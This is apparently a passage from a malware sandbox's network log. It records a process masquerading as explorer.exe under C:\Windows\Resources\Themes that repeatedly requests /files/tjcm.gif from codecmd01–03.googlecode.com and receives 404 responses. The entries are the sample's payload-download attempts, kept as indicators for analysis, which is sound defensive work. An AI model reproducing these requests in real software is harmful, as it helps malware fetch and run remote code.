                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:03.497456074 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.549731108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:04.648987055 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:05.361100912 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:05 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:05.361125946 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.549732108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:06.523457050 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:07.233616114 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:07 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:07.234153032 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.54973474.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:08.404951096 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:09.104554892 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:09 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:09.104588985 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.549735108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:10.059099913 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:10.770174980 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:10 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:10.770344019 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.549736108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:11.728315115 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:12.433562040 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:12 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:12.433588982 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.54973774.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:13.545316935 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:14.225270033 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:14 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:14.225295067 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.549738108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:15.040956974 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:15.758626938 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:15 GMT
